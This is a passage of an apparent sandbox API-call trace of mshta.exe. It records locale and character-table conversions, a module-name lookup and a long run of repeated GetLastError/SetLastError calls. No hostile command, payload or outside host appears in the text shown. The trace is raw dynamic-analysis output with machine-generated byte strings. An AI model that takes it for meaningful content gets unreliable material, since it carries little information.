(dwErrCode=0x0) [0060.589] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x33f240 | out: lpCharType=0x33f240) returned 1 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: 
lpWideCharStr=0x0) returned 256 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x33f028, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0060.589] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x33f2c4 | out: lpCharType=0x33f2c4) returned 1 [0060.589] GetLastError () returned 0x0 [0060.589] SetLastError (dwErrCode=0x0) [0060.589] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x33efc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 
¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜤?Ā") returned 256 [0060.589] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜤?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.589] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜤?Ā", cchSrc=256, lpDestStr=0x33edb8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0060.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, 
lpMultiByteStr=0x33f5c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿðB,Ûü÷3", lpUsedDefaultChar=0x0) returned 256 [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x33efe8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜄?Ā") returned 256 [0060.590] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜄?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.590] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜄?Ā", cchSrc=256, lpDestStr=0x33edd8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0060.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x33f4c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿðB,Ûü÷3", lpUsedDefaultChar=0x0) returned 256 [0060.590] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x97b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () 
returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () 
returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () 
returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () 
returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () 
returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () 
returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) 